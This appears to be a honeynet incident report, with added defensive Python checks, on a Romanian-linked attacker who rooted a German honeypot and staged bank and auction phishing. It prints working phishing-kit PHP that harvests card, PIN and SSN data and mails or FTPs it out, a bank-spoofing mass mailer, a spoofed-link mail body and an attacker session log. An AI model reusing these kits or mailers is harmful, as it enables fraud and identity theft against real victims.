Details of German compromise

On November 12, 2004, the Honeynet was connected to the Internet. Between start-up and November 22, nothing special happened. We just observed an enormous number of packets with destination port 445, which is not critical for the installed Honeypot.

At 1:16 am the Honeypot was compromised through an exploit against the WU-FTP daemon. There was no port scan or FTP connection beforehand; the first connection was used to hack the computer, which is an indication of an autorooter tool. Such tools are used to scan whole network ranges for vulnerable machines and attack everything they come across. They just deliver their "evil" payload to every system in the given address range. In our case, it was probably a tool called superwu, since later on the attacker used this tool to attack further targets from the Honeypot.

Until 8:21 am there was no activity from the attacker. He probably started the tool the night before and checked in the morning for successfully gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces some system binaries with trojaned files:

/usr/bin/dir /usr/bin/top /bin/ps
/sbin/ifconfig /usr/bin/slocate /usr/bin/pstree
/bin/netstat /usr/bin/vdir /usr/bin/socklist
/usr/bin/strings /usr/bin/chattr /usr/sbin/lsof

In addition, it installs an SSH daemon on port 255, which the attacker subsequently used to log on to the Honeypot. The rootkit uses source code to compile new versions of binary files. These trojaned executables are adjusted to the size of the original files of the target system to "hide" their presence. The rootkit also installs a sniffer to collect login information for other systems. Furthermore, it modifies the init scripts to ensure that the installed services will start on the next reboot, and then sends an information mail about the system status to the attacker. After finishing the installation, the attacker re-entered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH client for Windows systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web pages for updating the billing profile of seller accounts of a large Internet auctions website. The attacker copied these files into the document root of the webserver. The "index.html" start page is a forwarding page to the auctions website. The reason for that is that these PHP pages were incomplete. The attacker edited them, but never finished his work on these files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker.
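Because the rootkit described above pads its trojaned binaries to the size of the originals, a size comparison reports nothing, while a content hash against a known-good baseline does. The following is an added example, not part of the original report; the file names and contents are constructed stand-ins created in a temporary directory.

```python
import hashlib
import tempfile
from pathlib import Path


def fingerprint(path):
    """Size and SHA-256 of one file."""
    data = Path(path).read_bytes()
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def build_manifest(root, rel_paths):
    """Record a known-good baseline for the given paths below root."""
    return {rel: fingerprint(Path(root, rel)) for rel in rel_paths}


def verify(root, manifest, by_size_only=False):
    """Compare the current files against the baseline manifest."""
    report = {}
    for rel, known in manifest.items():
        target = Path(root, rel)
        if not target.is_file():
            report[rel] = "missing"
            continue
        now = fingerprint(target)
        if now["size"] != known["size"]:
            report[rel] = "size-changed"
        elif not by_size_only and now["sha256"] != known["sha256"]:
            report[rel] = "content-changed-same-size"
        else:
            report[rel] = "ok"
    return report


def demo():
    """Baseline two constructed 'binaries', swap one for a same-size file, verify."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "bin/ps": b"ORIGINAL-PS".ljust(64, b"\x00"),
            "bin/netstat": b"ORIGINAL-NETSTAT".ljust(64, b"\x00"),
        }
        for rel, data in files.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        manifest = build_manifest(root, files)

        # Constructed replacement: different content, padded to the original size.
        replaced = b"REPLACED-PS".ljust(len(files["bin/ps"]), b"\x00")
        Path(root, "bin/ps").write_bytes(replaced)

        return verify(root, manifest, by_size_only=True), verify(root, manifest)


if __name__ == "__main__":
    size_only, full = demo()
    print("size-only check:", size_only)
    print("hash check:     ", full)
```

Such a check is only meaningful when run from trusted media with the manifest stored off-host: the archive listing later on this page shows the kit shipping its own md5sum, ls and ps.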

At 8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC bouncer and started an IRC session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same untypical open port 255 with a listening SSH daemon that the Honeypot had. The attacker also entered another channel and received operator rights there. The topic on this channel was a pointer to his personal homepage and the language used in that channel was Romanian.

At 6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen session with a target network as parameter. Then the attacker detached the session and logged off. Later, when he came back, he attached the session again to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not notice the intervention and, at 10:40 pm, downloaded and installed a "socksify" proxy which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for spreading spam or for anonymous connections to any other systems. During the honeynet's online time, it was never used.

On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session captured by the snort binary logging.

At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished webpages similar to the spam.tgz archive. The attacker installed them in the document root directory of the webserver. Now this Honeypot could be used for phishing attacks. By calling the startup page, you get a login page that looks like the original login page. While unrelated to the incident we report, a recent example illustrating the similarity of a phishing data entry form to the actual site can be found here.

The input of this form is given a rudimentary check by a small PHP script:

<?php
//chk:
if(strlen($userid)<1 || strlen($pass)<1) {
    echo 'Invalid user/password';
}
else {
    $mesaj = "$userid $pass";
    header ("Location:verify.html");
    $muie = fopen("/tmp/User.doc", "w");
    fwrite($muie, $mesaj);
    fclose($muie);
    exit();
}
?>

For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggest a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it is written to the file /tmp/User.doc and the next page is shown. On this page, the victim is tricked into entering personal information. All input is checked, and if any field does not meet the conditions, an error page is shown. This error page does not attempt to mimic the real error page and most victims would likely become suspicious of the fake web site at this point.

With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the webserver because Apache does not accept .dll files as PHP files by default. The attacker forgot to set the "AddType" directive of the Apache server to interpret .dll files with the PHP engine. The attacker's next activity was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:

<?php
include("ini.inc");
$mail_header = "From: support@Bank.com<support@Bank.com>\n";
$mail_header .= "Content-Type: text/html\n";
$subject="Bank Security Department ";
$body=loadini("test.txt");
if (!($fp = fopen("list.txt", "r")))
    exit("Unable to open $listFile.");
$i=0;
print "Start time is ";
print date("Y:m:d H:i");
print "\n";
while (!feof($fp)) {
    fscanf($fp, "%s", $name);
    $i++;
    mail($name, $subject, $body, $mail_header);
}
print "End time is ";
print date("Y:m:d H:i");
print "\n";
print "$i";
print "emails sent.";
print"\n";
?>

After downloading the test.txt file which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of this file shows the real target of the comprised link:

Please follow the link below and renew your account information. <br><br> <a href="http://XXX.XXX.XXX.XXX/Checking/login.php" onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')" onMouseOver="window.status='https://internetbanking.bank.com';return true;" onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a> <br> <br>
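The mail body above shows an HTTPS bank address as the link text and in the browser status bar while the href points at a bare IP address. The following mail-filter check for exactly those traits is an added example, not part of the original report; the sample mail is constructed, with 192.0.2.10 and the .example names standing in for the redacted and third-party hosts.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample modelled on the mail body quoted above.
SAMPLE_MAIL = '''Please follow the link below and renew your account information. <br><br>
<a href="http://192.0.2.10/Checking/login.php"
   onClick="popup('http://tracker.example/click.cgi?id=1')"
   onMouseOver="window.status='https://internetbanking.bank.example';return true;"
   onMouseOut="window.status=' ';return true;">https://internetbanking.bank.example</a>
<br><a href="https://internetbanking.bank.example/help">Help</a>'''


def host_of(url):
    """Lower-cased host of a URL, or None if it has no network location."""
    if "://" not in url:
        url = "http://" + url  # bare "www.example.com" style link text
    return (urlsplit(url).hostname or "").lower() or None


def audit_anchor(attrs, text):
    """Return the reasons one <a> element looks deceptive (empty list if none)."""
    reasons = []
    href = attrs.get("href") or ""
    href_host = host_of(href) if href else None
    shown = text.lower()
    looks_like_url = shown.startswith(("http://", "https://", "www."))
    if looks_like_url and href_host and host_of(text) != href_host:
        reasons.append("text-host-mismatch")
    if shown.startswith("https://") and href.lower().startswith("http://"):
        reasons.append("https-text-http-href")
    try:
        ipaddress.ip_address(href_host or "")
        reasons.append("ip-literal-href")
    except ValueError:
        pass
    # HTMLParser lower-cases attribute names, so onMouseOver arrives as onmouseover.
    handlers = [value or "" for name, value in attrs.items() if name.startswith("on")]
    if any("window.status" in value for value in handlers):
        reasons.append("status-bar-spoof")
    return reasons


class AnchorAudit(HTMLParser):
    """Collects (href, visible text, reasons) for every anchor in a mail body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.results = []
        self._open = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._open = (dict(attrs), [])

    def handle_data(self, data):
        if self._open:
            self._open[1].append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._open:
            attrs, parts = self._open
            text = "".join(parts).strip()
            self.results.append((attrs.get("href"), text, audit_anchor(attrs, text)))
            self._open = None


def audit_mail(html):
    parser = AnchorAudit()
    parser.feed(html)
    parser.close()
    return parser.results


if __name__ == "__main__":
    for href, text, reasons in audit_mail(SAMPLE_MAIL):
        print(f"{text!r} -> {href!r}: {', '.join(reasons) or 'ok'}")
```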

At this point we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we blocked outgoing connections and concluded that something weird was happening. He never came back, and on December 8, 2004, the honeynet went offline for further analysis.

What else did we find?

We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input is checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:

<?php
session_start();
$log0 = $_POST['CARD_NUMBER'];
$log1= $_POST['CVV2'];
$log2 = $_POST['MOTHERS_MAIDEN_NAME'];
$log3 = $_POST['EMAIL'];
$log4 = $_POST['nmc'];
$log5 = $_POST['addr'];
$log6 = $_POST['cd'];
$log7 = $_POST['pin'];
$log8 = $_POST['country'];
$log9 = $_POST['city'];
$log10 = $_POST['state'];
$log11 = $_POST['exp'];
$log12 = $_POST['user'];
$log13 = $_POST['password'];
$log14 = $_POST['bankname'];
$log15 = $_POST['bankrouting'];
$log16 = $_POST['checkingaccount'];
$log17 = $_POST['bankacc'];
$td = date("F jS");
$date = date("d M, Y");
$time = date("g:i a");
$LogTime = trim(" Date: ".$date.", Time: ".$time );
mail("XXXXXX@yahoo.com", "Bank Results", "$log0\n$log1\n$log2\n$log3\n$log4\n$log5\n$log6\n $log7\n$log8\n$log9\n$log10\n$log11\n$log12\n$log13\n$log14\n$log15\n$log16\n$log17");
header ("Location: proccessing.html");
exit;
?>

After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found that the input is not checked for reasonable values. Instead, it is simply sent to the attacker by mail when the "Save" button is used. Furthermore, we found a mailer script for a US bank which works like the mailer script above. It is a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.
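The harvesting scripts quoted on this page share three traits: they read several sensitive form fields, hand them to a fixed mail address, an FTP upload or a file under /tmp, and then redirect the browser. The following document-root scanner built on those traits is an added example, not part of the original report; the keyword lists, verdict names and sample files are assumptions constructed for illustration, and files are scanned regardless of extension because the kit on this page used a .dll name.

```python
import re
from pathlib import Path

# Heuristics drawn from traits the captured scripts on this page share.
EXACT = {"pin", "pass", "userid", "mmn"}          # matched as whole names
PARTIAL = ("card", "ccnumber", "cvv", "passw", "ssn", "maiden", "routing")
EXFIL = {
    "mail-to-fixed-address": re.compile(r"\bmail\s*\(\s*['\"][^'\"]+@[^'\"]+['\"]", re.I),
    "ftp-upload": re.compile(r"\bftp_put\s*\(", re.I),
    "tmp-file-write": re.compile(r"\bfopen\s*\(\s*['\"]/tmp/[^'\"]+['\"]\s*,\s*['\"][wa]", re.I),
}
REDIRECT = re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I)
NAME = re.compile(r"\$(?:_POST\[\s*['\"])?(\w+)")   # $var or $_POST['field']

# Constructed samples (not the captured files); addresses use reserved .example names.
SAMPLES = {
    "login.php": r'''<?php
$mesaj = "$userid $pass";
header ("Location:verify.html");
$fh = fopen("/tmp/User.doc", "w");
fwrite($fh, $mesaj);
?>''',
    "confirm.dll": r'''<?php
$a = $_POST['CARD_NUMBER'];
$b = $_POST['CVV2'];
mail("drop@mailbox.example", "Results", "$a\n$b");
header("Location: processing.html");
?>''',
    "contact.php": r'''<?php
$msg = $_POST['message'];
$shipping = $_POST['shipping'];
mail("support@shop.example", "Contact form", $msg);
header("Location: thanks.html");
?>''',
}


def inspect(src):
    """Classify one source file by the three traits described above."""
    names = {n.lower() for n in NAME.findall(src)}
    sensitive = sorted(n for n in names if n in EXACT or any(p in n for p in PARTIAL))
    exfil = sorted(k for k, rx in EXFIL.items() if rx.search(src))
    redirect = bool(REDIRECT.search(src))
    if len(sensitive) >= 2 and exfil and redirect:
        verdict = "likely-harvester"
    elif len(sensitive) >= 2 and exfil:
        verdict = "review"
    else:
        verdict = "no-match"
    return {"verdict": verdict, "sensitive": sensitive, "exfil": exfil, "redirect": redirect}


def scan_tree(root):
    """Inspect every regular file under root, whatever its extension."""
    out = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file():
            out[str(path.relative_to(root))] = inspect(path.read_text(errors="replace"))
    return out


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        result = inspect(src)
        print(f"{name}: {result['verdict']} {result['sensitive']} {result['exfil']}")
```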

Analysis of German attacker's sessions

This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rootkit was installed, which were again reconstructed with the help of Snort log files.

Screenshot of the rootkit installation:

[image:../../images/rootkit_screenshot.png size=full]

Commands issued by the attacker:

  /usr/sbin/adduser ro
  passwd ro
  0030934040877
  0030934040877
  Changing password for user ro
  passwd: all authentication tokens updated successfully
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  choose
  Name (204.92.xxx.xxx:root): 331 User choose okay, need password.
  a
  530 Login incorrect.
  bye
  Remote system type is UNIX.
  Using binary mode to transfer files.
  221 Goodbye.
  ftp -v 204.92.xxx.xxx
  Connected to 204.92.xxx.xxx.
  220 Ftp server ready.
  example
  Name (204.92.xxx.xxx:root): 331 User example okay, need password.
  choose
  230-You are user #14 of 350 simultaneous users allowed.
  230-
  230 Restricted user logged in.
  hash
  pass
  deb
  bin
  Remote system type is UNIX.
  Using binary mode to transfer files.
  Hash mark printing on (1024 bytes/hash mark).
  Passive mode off.
  Debugging on (debug=1).
  ---> TYPE I
  200 Type okay.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  ls
  250 "/cgi-bin/rootkyt" is new cwd.
  ---> TYPE A
  200 Type okay.
  ---> PORT 212,44,161,115,9,136
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 21194156 Sep 6 06:41 list.txt.txt
  -rw-r--r-- 1 ftpuser web 723128 Jun 21 15:01 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/cgi-bin" is new cwd.
  ls
  ---> PORT 212,44,161,115,9,137
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 4107318 Feb 22 2004 SS.tgz
  -rw-r--r-- 1 ftpuser web 55271 Aug 6 08:02 Bank.zip
  -rw-r--r-- 1 ftpuser web 0 Sep 24 16:10 aw.tgz
  -rw-r--r-- 1 ftpuser web 1528 May 25 2004 email.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 11:08 limba1.tgz
  -rw-r--r-- 1 ftpuser web 52250 Aug 9 15:20 limbos.tgz
  -rw-r--r-- 1 ftpuser web 50177 May 23 2004 muie.tgz
  -rw-r--r-- 1 ftpuser web 0 Sep 26 09:01 new2.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 14 11:34 website
  -rw-r--r-- 1 ftpuser web 102240 Jun 4 16:46 website.tar.gz
  -rw-r--r-- 1 ftpuser web 102223 Jun 4 16:45 website.tgz
  -rwxr-xr-x 1 ftpuser web 3350063 Jul 9 17:39 php
  -rw-r--r-- 1 ftpuser web 0 Sep 30 15:07 pulamea.tgz
  drwxr-xr-x 2 ftpuser web 512 Sep 6 06:29 rootkyt
  -rw-r--r-- 1 ftpuser web 50200 May 23 2004 sa-va-dau-la-muie.tgz
  -rw-r--r-- 1 ftpuser web 1960 Aug 3 06:24 send.tgz
  -rw-r--r-- 1 ftpuser web 2086 Sep 22 15:04 sendspam.tgz
  -rw-r--r-- 1 ftpuser web 0 Oct 3 08:09 spam.tar.gz
  -rw-r--r-- 1 ftpuser web 52236 Aug 3 06:12 spam1.tgz
  -rw-r--r-- 1 ftpuser web 50176 Sep 22 14:29 spamul.tgz
  -rw-r--r-- 1 ftpuser web 2758 May 26 2004 trimite.zip
  226 Listing completed.
  cd ..
  ---> CWD ..
  ls
  250 "/" is new cwd.
  ---> PORT 212,44,161,115,9,138
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  drwxr-x--- 5 ftpuser web 512 Oct 25 10:59 cgi-bin
  drwxr-x--- 4 ftpuser web 1024 Nov 14 17:21 www
  226 Listing completed.
  cd www
  ---> CWD www
  ls
  250 "/www" is new cwd.
  ---> PORT 212,44,161,115,9,139
  200 PORT command successful.
  ---> LIST
  150 Opening ASCII mode data connection for /bin/ls.
  -rw-r--r-- 1 ftpuser web 13996 Apr 22 2004 asp.tgz
  -rw-r----- 1 ftpuser web 695 Jan 21 2003 index.htm
  -rw-r--r-- 1 ftpuser web 82211 Oct 20 2003 local.tgz
  -rw-r--r-- 1 ftpuser web 37910 Sep 16 2003 mass2.tar.gz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 muie
  -rw-r--r-- 1 ftpuser web 12755 Jun 6 2003 pizda.tgz
  -rw-r--r-- 1 ftpuser web 130892 Jun 5 2003 screen.tgz
  -rw-r--r-- 1 ftpuser web 0 Nov 11 10:39 spam-asp.tgz
  -rw-r--r-- 1 ftpuser web 10332 Aug 11 2003 sslstop.tar.gz
  -rw-r--r-- 1 ftpuser web 31965 Oct 20 2003 strobe.tgz
  drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 superwu.tgz
  226 Listing completed.
  cd ..
  ---> CWD ..
  250 "/" is new cwd.
  cd cgi-bin
  ---> CWD cgi-bin
  250 "/cgi-bin" is new cwd.
  cd rootkyt
  ---> CWD rootkyt
  250 "/cgi-bin/rootkyt" is new cwd.
  get superwu.tgz
  local: superwu.tgz remote: superwu.tgz
  ---> TYPE I
  200 Type okay.
  ---> PORT 212,44,161,115,9,140
  200 PORT command successful.
  ---> RETR superwu.tgz
  150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
  ##################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
  226 Transfer completed.
  bye
  723128 bytes received in 96.7 secs (7.3 Kbytes/sec)
  ---> QUIT
  221 Goodbye.
  tar xzvf superwu.tgz
  .nr/
  .nr/createdir
  .nr/firewall
  .nr/status
  .nr/clean
  .nr/mailme
  .nr/patch
  .nr/remove
  .nr/replace
  .nr/startfile
  .nr/init
  .nr/sendmail/
  .nr/sendmail/sshd_config
  .nr/sendmail/ssh_host_key
  .nr/sendmail/ssh_random_seed
  .nr/sendmail/sendmail
  .nr/chattr
  .nr/dir
  .nr/du
  .nr/encrypt
  .nr/fix
  .nr/ifconfig
  .nr/killall
  .nr/libproc.so.2.0.6
  .nr/login
  .nr/ls
  .nr/lsof
  .nr/md5sum
  .nr/netstat
  .nr/ps
  .nr/pstree
  .nr/socklist/
  .nr/socklist/Xf/
  .nr/socklist/Xf/fix.c
  .nr/socklist/Xf/fix
  .nr/socklist/Xf/chattr
  .nr/socklist/Xf/socklistx.c
  .nr/socklist/Xf/socklistx
  .nr/socklist/Xf/move
  .nr/socklist/Xf/stringsx.c
  .nr/socklist/Xf/stringsx
  .nr/socklist/socklist
  .nr/socklist/utils/
  .nr/socklist/utils/.siz.c
  .nr/socklist/utils/siz
  .nr/top
  .nr/vdir
  .nr/lg
  .nr/.c
  .nr/.d
  .nr/.p
  .nr/write
  .nr/read
  .nr/cl
  .nr/curatare/
  .nr/curatare/ps
  .nr/curatare/pstree
  .nr/curatare/sshd
  .nr/curatare/clean
  .nr/curatare/chattr
  .nr/curatare/attrib
  setup
  ./setup

German PHP script analysis

In this side note we analyse an example script that was used to validate the information entered by users into an HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.

<?php
$errchk=0;
$error = "None";
$badw="fuck pussy dick suck asshole";

//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
    $error="Invalid email address, please re-submit.";
    $errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
    $error="Invalid bank routing number, please re-submit.";
    $errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
    $error="Invalid card validation code, please re-submit.";
    $errchk=4;
}

//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
    $error="Invalid pin number, please re-submit.";
    $errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
    $error="Please enter your full name and re-submit.";
    $errchk=5;
}
else if(strlen($streetaddr)<1){
    $error="Please enter your address and re-submit.";
    $errchk=5;
}
else if(strlen($cityaddr)<1){
    $error="Please enter your city and re-submit.";
    $errchk=5;
}
else if(strlen($mmn)<1){
    $error="Please enter your Mother Maiden Name and re-submit.";
    $errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
    $error="Please enter your Date Of Birth and re-submit.";
    $errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$streetaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$cityaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$mmn)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
    $efile=fopen("/tmp/User.doc","r");
    fscanf($efile,"%s",$userid);
    fscanf($efile,"%s",$pass);
    fclose($efile);
    $timed = date ("l dS of F Y h:i:s A");
    $ip = $_SERVER["REMOTE_ADDR"];
    $message="----------------------------------------------------------------------------
    On $timed the user ($ip) wrote:
    CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";

    $message=$message."UserId - $userid";

    $message=$message."Password - $pass";

    $message=$message."Email - $email";

    $message=$message."Email Password - $emailp";

    $message=$message."Full Name - $username";

    $message=$message."Address - $streetaddr";

    $message=$message."City - $cityaddr";

    $message=$message."State - $stateprovaddr";

    $message=$message."Zip Code - $zipcodeaddr";

    $message=$message."Phone number - $phone";

    $message=$message."Country - $countryaddr";

    $message=$message."CVV - $cvv2";

    $message=$message."Bank Name - $bank";

    $message=$message."Bank Routing # - $bankr
        Checking Account # - $bankc
        Social Security Number - $ssn
        Card PIN Number - $ccp
        Mother's Maiden Name - $mmn
        Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
        Driver Licence Number - $dln";

    mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From:  tzonfi <xxxxxx@xxxxxx.com>\n");

    header ("Location:xxxxISAPI.dll");
    //$muie = fopen("/tmp/eb.txt", "a");
    //fwrite($muie, $message);
    //fclose($muie);
    //include("cc-ftp.php");
    exit();
}
else {
    echo $error;
}
?>

The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:

<?php
include("r-config.php"); // the server login information
$fcon = ftp_connect($host);
if(@ftp_login($fcon, $user, $pass)) {
    ftp_put($fcon, $fremote, $flocal, FTP_ASCII);
}
else {
    $msg = "Unable to connect to host: $host with user: $user and pass: $pass. Please update me.";
    mail ("xxxxxx@xxxxxx","Ftpupdate","$msg","From:jmekeru <xxxxxx@xxxxxx>\n");
}
ftp_close($fcon);
?>

Redirected Phishing Victims

In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data was collected with the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably from recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured, we cannot make an educated guess as to how many people actually entered sensitive information into the HTML form on the Chinese phishing web site.
